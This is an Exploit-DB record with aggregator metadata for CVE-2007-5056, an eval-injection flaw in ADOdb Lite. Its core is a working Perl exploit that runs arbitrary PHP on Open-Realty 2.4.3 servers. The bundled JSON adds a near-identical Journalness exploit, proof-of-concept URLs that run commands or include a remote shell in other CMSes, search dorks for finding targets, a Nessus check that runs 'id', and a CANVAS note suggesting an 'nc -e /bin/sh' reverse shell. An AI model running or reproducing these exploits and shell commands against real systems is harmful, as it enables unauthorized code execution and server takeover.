ID EDB-ID:5090
Type exploitdb
Reporter Iron
Modified 2008-02-09T00:00:00
Description
Open-Realty <= 2.4.3 (last_module) Remote Code Execution Exploit. CVE-2007-5056. Webapps exploit for php platform
#!/usr/bin/perl
#
# Vendor url: www.open-realty.org
#
# note: exploit requires Register_globals = On in php.ini
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
print "#
# Open-Realty <= 2.4.3 Remote Code Execution exploit
# By Iron - randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/openrealtydir/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
if($target !~ /\/$/)
{
$target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=<stdin>);
$code =~ s/(<\?php|\?>|<\?)//ig;
$target .= "include/class/adodb/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};".$code."//";
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($target);
if ($response->is_success)
{
print "\n"."#" x 20 ."\n";
print $response->content;
print "\n"."#" x 20 ."\n";
}
else
{
die "Error: ".$response->status_line;
}
# milw0rm.com [2008-02-09]
{"id": "EDB-ID:5090", "hash": "21e8a525942168f2d2e999eff3b29198", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Open-Realty <= 2.4.3 last_module Remote Code Execution Exploit", "description": "Open-Realty <= 2.4.3 (last_module) Remote Code Execution Exploit. CVE-2007-5056. Webapps exploit for php platform", "published": "2008-02-09T00:00:00", "modified": "2008-02-09T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5090/", "reporter": "Iron", "references": [], "cvelist": ["CVE-2007-5056"], "lastseen": "2016-01-31T21:33:25", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5056"]}, {"type": "exploitdb", "idList": ["EDB-ID:5097", "EDB-ID:5098", "EDB-ID:5091", "EDB-ID:4442"]}, {"type": "nessus", "idList": ["ADODB_LITE_LAST_MODULE_CMD_EXEC.NASL"]}, {"type": "canvas", "idList": ["CMSMADESIMPLE_EVAL", "PACERCMS_EXEC", "OPENREALTY_EXEC"]}], "modified": "2016-01-31T21:33:25"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/5090/", "sourceData": "#!/usr/bin/perl\n#\n#\tVendor url: www.open-realty.org\n#\n# note: exploit requires Register_globals = On in php.ini\n#\t\t\t\t\t\t\t~Iron\n#\t\t\t\t\t\t\thttp://www.randombase.com\nrequire LWP::UserAgent;\n\nprint \"#\n# Open-Realty <= 2.4.3 Remote Code Execution exploit\n# By Iron - randombase.com\n# Greets to everyone at RootShell Security Group\n#\n# Example target url: http://www.target.com/openrealtydir/\nTarget url?\";\nchomp($target=<stdin>);\nif($target !~ /^http:\\/\\//)\n{\n\t$target = \"http://\".$target;\n}\nif($target !~ /\\/$/)\n{\n\t$target .= \"/\";\n}\nprint \"PHP code to evaluate? \";\nchomp($code=<stdin>);\n$code =~ s/(<\\?php|\\?>|<\\?)//ig;\n$target .= \"include/class/adodb/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};\".$code.\"//\";\n\n$ua = LWP::UserAgent->new;\n$ua->timeout(10);\n$ua->env_proxy;\n\n$response = $ua->get($target);\n\nif ($response->is_success)\n{\n\tprint \"\\n\".\"#\" x 20 .\"\\n\";\n\tprint $response->content;\n\tprint \"\\n\".\"#\" x 20 .\"\\n\";\n}\nelse\n{\n die \"Error: \".$response->status_line;\n}\n\n# milw0rm.com [2008-02-09]\n", "osvdbidlist": ["40596"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-09-29T14:25:32", "bulletinFamily": "NVD", "description": "Eval injection vulnerability in adodb-perf-module.inc.php in ADOdb Lite 1.42 and earlier, as used in products including CMS Made Simple, SAPID CMF, Journalness, PacerCMS, and Open-Realty, allows remote attackers to execute arbitrary code via PHP sequences in the last_module parameter.", "modified": "2017-09-28T21:29:28", "published": "2007-09-24T18:17:00", "id": "CVE-2007-5056", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5056", "title": "CVE-2007-5056", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T20:56:06", "bulletinFamily": "exploit", "description": "CMS Made Simple 1.2 Remote Code Execution Vulnerability. CVE-2007-5056. Webapps exploit for php platform", "modified": "2007-09-21T00:00:00", "published": "2007-09-21T00:00:00", "id": "EDB-ID:4442", "href": "https://www.exploit-db.com/exploits/4442/", "type": "exploitdb", "title": "CMS Made Simple 1.2 - Remote Code Execution Vulnerability", "sourceData": "# o [bug] /\"*._ _ #\n# . . . .-*'` `*-.._.-'/ #\n# o o < * )) , ( #\n# . o `*-._`._(__.--*\"`.\\ #\n# #\n# vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability #\n# author: irk4z@yahoo.pl #\n# download: #\n# http://dev.cmsmadesimple.org/frs/download.php/1424/cmsmadesimple-1.1.2.zip #\n# dork: \"powered by CMS Made Simple version 1.1.2\" #\n# greetz: cOndemned, kacper, str0ke #\n\n# code:\n\n/lib/adodb_lite/adodb-perf-module.inc.php:\n...\n eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');\n...\n\n# exploit:\n\n http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();\n http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ]\n\n# milw0rm.com [2007-09-21]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4442/"}, {"lastseen": "2016-01-31T22:33:31", "bulletinFamily": "exploit", "description": "Journalness <= 4.1 (last_module) Remote Code Execution exploit. CVE-2007-5056. Webapps exploit for php platform", "modified": "2008-02-09T00:00:00", "published": "2008-02-09T00:00:00", "id": "EDB-ID:5091", "href": "https://www.exploit-db.com/exploits/5091/", "type": "exploitdb", "title": "Journalness <= 4.1 last_module Remote Code Execution Exploit", "sourceData": "#!/usr/bin/perl\n#\n#\tVendor url: journalness.sourceforge.net\n#\n# note: exploit requires Register_globals = On in php.ini\n#\t\t\t\t\t\t\t~Iron\n#\t\t\t\t\t\t\thttp://www.randombase.com\nrequire LWP::UserAgent;\n\nprint \"#\n# Journalness <= 4.1 Remote Code Execution exploit\n# By Iron - randombase.com\n# Greets to everyone at RootShell Security Group & dHack\n#\n# Example target url: http://www.target.com/journalnessdir/\nTarget url?\";\nchomp($target=<stdin>);\nif($target !~ /^http:\\/\\//)\n{\n\t$target = \"http://\".$target;\n}\nif($target !~ /\\/$/)\n{\n\t$target .= \"/\";\n}\nprint \"PHP code to evaluate? \";\nchomp($code=<stdin>);\n$code =~ s/(<\\?php|\\?>|<\\?)//ig;\n$target .= \"includes/database/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};\".$code.\"//\";\n\n$ua = LWP::UserAgent->new;\n$ua->timeout(10);\n$ua->env_proxy;\n\n$response = $ua->get($target);\n\nif ($response->is_success)\n{\n\tprint \"\\n\".\"#\" x 20 .\"\\n\";\n\tprint $response->content;\n\tprint \"\\n\".\"#\" x 20 .\"\\n\";\n}\nelse\n{\n die \"Error: \".$response->status_line;\n}\n\n# milw0rm.com [2008-02-09]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/5091/"}, {"lastseen": "2016-01-31T21:34:28", "bulletinFamily": "exploit", "description": "PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability. CVE-2007-5056. Webapps exploit for php platform", "modified": "2008-02-10T00:00:00", "published": "2008-02-10T00:00:00", "id": "EDB-ID:5098", "href": "https://www.exploit-db.com/exploits/5098/", "type": "exploitdb", "title": "PacerCMS 0.6 last_module Remote Code Execution Vulnerability", "sourceData": "### PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability\n### Script : http://ovh.dl.sourceforge.net/sourceforge/pacercms/pacercms0.6.zip\n### Dork : Powered by PacerCMS\n### POC :\n### /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//\n### OR INCLUDE SHELL\n### /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//\n### I'm TrYaGi ......:)\n\n# milw0rm.com [2008-02-10]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/5098/"}, {"lastseen": "2016-01-31T22:34:05", "bulletinFamily": "exploit", "description": "SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability. CVE-2007-5056. Webapps exploit for php platform", "modified": "2008-02-10T00:00:00", "published": "2008-02-10T00:00:00", "id": "EDB-ID:5097", "href": "https://www.exploit-db.com/exploits/5097/", "type": "exploitdb", "title": "SAPID CMF Build 87 last_module Remote Code Execution Vulnerability", "sourceData": "### SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability\n### Script R84 : http://puzzle.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.r84.zip\n### Script Update R87 :http://surfnet.dl.sourceforge.net/sourceforge/sapidcmf/sapidcmf.update.r84-r87.zip\n### Dork : Powered by SAPID CMF Build 87\n### Vuln :\n### 09: */\n\neval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');\n### POC :\n### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//\n### OR INCLUDE SHELL\n### /vendors/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//\n### I'm TrYaGi ......:)\n\n# milw0rm.com [2008-02-10]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/5097/"}], "nessus": [{"lastseen": "2019-01-16T20:07:28", "bulletinFamily": "scanner", "description": "ADOdb Lite, a lightweight database framework for PHP applications, is\ninstalled on the remote host. \n\nThe version of ADOdb Lite on the remote host fails to sanitize input\nto the 'last_module' parameter of the 'adodb-perf-module.inc.php'\nscript before using it in an 'eval()' statement to evaluate PHP code. \nAn unauthenticated attacker can leverage this issue to execute\narbitrary code on the remote host subject to the privileges of the web\nserver user id.", "modified": "2018-11-15T00:00:00", "published": "2007-09-24T00:00:00", "id": "ADODB_LITE_LAST_MODULE_CMD_EXEC.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=26072", "title": "ADOdb Lite adodb-perf-module.inc.php last_module Parameter Arbitrary Code Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(26072);\n script_version(\"1.20\");\n\n script_cve_id(\"CVE-2007-5056\");\n script_bugtraq_id(25768, 25997);\n script_xref(name:\"EDB-ID\", value:\"4442\");\n\n script_name(english:\"ADOdb Lite adodb-perf-module.inc.php last_module Parameter Arbitrary Code Execution\");\n script_summary(english:\"Tries to run a command via ADOdb Lite's adodb-perf-module.inc.php\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a CGI script that allows arbitrary\ncommand execution.\" );\n script_set_attribute(attribute:\"description\", value:\n\"ADOdb Lite, a lightweight database framework for PHP applications, is\ninstalled on the remote host. \n\nThe version of ADOdb Lite on the remote host fails to sanitize input\nto the 'last_module' parameter of the 'adodb-perf-module.inc.php'\nscript before using it in an 'eval()' statement to evaluate PHP code. \nAn unauthenticated attacker can leverage this issue to execute\narbitrary code on the remote host subject to the privileges of the web\nserver user id.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/481984/100/0/threaded\" );\n # http://web.archive.org/web/20071011195544/http://blog.cmsmadesimple.org/2007/10/07/announcing-cms-made-simple-1141/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6906a13e\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/09/24\");\n script_cvs_date(\"Date: 2018/11/15 20:50:16\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\", \"pafiledb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:80);\n\n# Generate a list of extra paths to check.\nextra_dirs = make_array();\nndirs = 0;\n# - CMS Made Simple\nforeach dir (cgi_dirs())\n{\n extra_dirs[ndirs++] = string(dir, \"/lib/adodb_lite\");\n}\nif (thorough_tests)\n{\n foreach dir (make_list(\"/cms\"))\n extra_dirs[ndirs++] = string(dir, \"/lib/adodb_lite\");\n}\n# - paFileDB.\ninstall = get_kb_item(string(\"www/\", port, \"/pafiledb\"));\nif (install)\n{\n matches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\n if (!isnull(matches))\n {\n dir = matches[2];\n extra_dirs[ndirs++] = string(dir, \"/includes/adodb\");\n }\n}\n\n\n# Try to exploit the issue to run a command.\ncmd = \"id\";\nexploit = string(\n \"zZz_ADOConnection{}system(\", cmd, \");class zZz_ADOConnection{}//\"\n);\n\nhttp_check_remote_code(\n extra_dirs : extra_dirs,\n check_request : string(\"/adodb-perf-module.inc.php?last_module=\", urlencode(str:exploit)),\n check_result : \"uid=[0-9]+.*gid=[0-9]+.*\",\n command : cmd,\n port : port,\n warning : TRUE\n);\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2016-09-25T14:14:09", "bulletinFamily": "exploit", "description": "**Name**| openrealty_exec \n---|--- \n**CVE**| CVE-2007-5056 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Open-Realty <= 2.4.3 Remote Code Execution \n**Notes**| CVE Name: CVE-2007-5056 \nVENDOR: Open-realty.org \nRepeatability: Infinite \nReferences: http://securityreason.com/exploitalert/3360 \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5056 \nCVSS: 6.8 \n\n", "modified": "2007-09-24T18:17:00", "published": "2007-09-24T18:17:00", "id": "OPENREALTY_EXEC", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/openrealty_exec", "type": "canvas", "title": "Immunity Canvas: OPENREALTY_EXEC", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-25T14:13:21", "bulletinFamily": "exploit", "description": "**Name**| pacercms_exec \n---|--- \n**CVE**| CVE-2007-5056 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| PacerCMS 0.6 Remote Code Execution \n**Notes**| CVE Name: CVE-2007-5056 \nVENDOR: PacerCMS \nRepeatability: Infinite \nReferences: http://secunia.com/advisories/28859/ \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5056 \nCVSS: 6.8 \n\n", "modified": "2007-09-24T18:17:00", "published": "2007-09-24T18:17:00", "id": "PACERCMS_EXEC", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/pacercms_exec", "type": "canvas", "title": "Immunity Canvas: PACERCMS_EXEC", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-25T14:13:34", "bulletinFamily": "exploit", "description": "**Name**| cmsmadesimple_eval \n---|--- \n**CVE**| CVE-2007-5056 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CMS Made Simple Eval \n**Notes**| CVE Name: CVE-2007-5056 \nVENDOR: cms made simple \nNotes: Try using nc -e /bin/sh as your command and having a nc -vlp \nRepeatability: Infinite \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5056 \nCVSS: 6.8 \n\n", "modified": "2007-09-24T18:17:00", "published": "2007-09-24T18:17:00", "id": "CMSMADESIMPLE_EVAL", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/cmsmadesimple_eval", "type": "canvas", "title": "Immunity Canvas: CMSMADESIMPLE_EVAL", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}